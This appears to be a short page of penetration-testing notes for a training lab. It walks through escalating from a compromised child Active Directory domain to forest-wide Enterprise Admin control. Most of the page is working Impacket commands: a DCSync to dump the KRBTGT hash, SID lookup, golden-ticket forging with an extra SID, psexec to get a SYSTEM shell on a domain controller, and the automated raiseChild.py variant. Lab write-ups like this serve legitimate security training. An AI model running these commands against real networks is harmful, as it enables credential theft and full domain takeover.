dcsync-and-golden-ticket

Required information:

The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain

Once we have complete control of the child domain, logistics.inlanefreight.local, we can use secretdump.py to DCSync and grab the NTLM hash for KRBTGT account.

DCSync attack (Get KRBTGT hash)

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

Brute force SID

lookupsid.py logistics.inlanefreight.local/htb-student_adm@<child_domain_DC_IP> | grep "Domain SID"

Grabbing the domain SID & attaching to group's RID

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

Create a golden ticket

ticketer.py -nthash <KRBTGT Hash> -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid <child_domain_SID> -extra-sid <root_domain_group_SID> <user>

export KRB5CCNAME=<user>.ccache

Get system shell in DC

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip <DC_machine_IP>

AUTOMATIC - create a golden ticket

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

Previousdcsync-abuse Nextdcsync

Last updated 1 month ago

hashtagRequired information:

hashtagDCSync attack (Get KRBTGT hash)

hashtagCreate a golden ticket

hashtagAUTOMATIC - create a golden ticket

Required information:

DCSync attack (Get KRBTGT hash)

Create a golden ticket

AUTOMATIC - create a golden ticket